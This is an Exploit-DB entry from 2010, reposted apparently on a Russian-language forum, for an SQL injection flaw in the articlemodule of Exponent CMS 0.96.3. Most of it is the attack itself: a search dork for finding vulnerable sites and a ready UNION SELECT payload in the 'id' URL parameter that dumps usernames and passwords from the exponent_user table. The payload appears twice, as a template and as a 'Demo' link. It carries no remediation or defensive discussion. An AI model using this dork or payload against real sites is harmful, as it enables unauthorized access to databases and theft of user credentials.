- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11349
- Проверка EDB
-
- Пройдено
- Автор
- T U R C O
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-02-07
Код:
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
========================================================
####################################################################
# Author : T u R c O
# Home : www.1923Turk.com
# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site" inurl:articlemodule
####################################################################
===[ Exploit ]===
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
-1+union+select+1,2,3,password,username,6+from+exponent_user--
Demo:
http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--
####################################################################- Источник
- www.exploit-db.com
